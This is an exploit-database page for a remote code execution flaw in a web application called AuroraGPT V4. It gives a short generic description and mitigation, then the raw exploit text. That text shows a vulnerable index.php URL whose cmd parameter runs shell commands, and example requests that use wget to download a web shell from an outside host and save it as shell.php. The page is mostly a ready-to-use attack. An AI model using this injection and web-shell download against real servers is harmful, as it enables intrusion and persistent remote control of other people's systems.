AuroraGPT V4 RCE Vulnerability

vendor:

AuroraGPT V4

by:

Amoo Arash

9,3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: AuroraGPT V4

Affected Version From: 4

Affected Version To: 4

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

AuroraGPT V4 RCE Vulnerability

A vulnerability exists in AuroraGPT V4 which allows an attacker to execute arbitrary code on the vulnerable system. The vulnerability is due to the application not properly sanitizing user-supplied input. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent malicious code from being executed. Additionally, the application should be kept up to date with the latest security patches.

Source

Exploit-DB raw data:

# Title : AuroraGPT V4 RCE Vulnerability
# Author: Amoo Arash
# Date : 2010-04-11
# Version : 4

[~]######################################### InformatioN #############################################[~]

[~] Title : AuroraGPT V4 RCE Vulnerability
[~] Author : Amoo Arash

[~]######################################### ExploiT #############################################[~]

[~] Vulnerable File :

http://127.0.0.1/index.php?view=help&faq=1&ref&cmd=[Command]

[~] ExploiT :

wget example.com/shell.txt -O shell.php

[~] Example :

http://127.0.0.1/index.php?view=help&faq=11&ref&cmd=wget http://amooarash.persiangig.com/ash.txt -O shell.php


[~]######################################### FinisH :D #############################################[~]